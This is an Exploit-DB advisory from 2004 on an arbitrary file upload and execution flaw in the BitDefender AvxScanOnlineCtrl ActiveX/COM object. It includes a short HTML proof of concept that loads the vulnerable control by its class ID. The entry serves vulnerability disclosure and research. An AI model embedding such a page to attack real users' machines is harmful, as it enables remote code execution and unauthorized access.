Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution

EDB-ID:

24024




Platform:

Windows

Date:

2004-04-19


source: https://www.securityfocus.com/bid/10174/info

Reportedly the BitDefender AvxScanOnlineCtrl COM object is affected by a file upload and execution vulnerability. This issue is due to a design error that allows a remote user to specify a file to be uploaded and executed on a system running the affected software.

This issue may be leveraged by a remote attacker to upload and execute arbitrary files on an affected system; most likely resulting in unauthorized access. Other attackers are also possible.

<HTML>
<OBJECT id=seemycomputer codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
</HTML>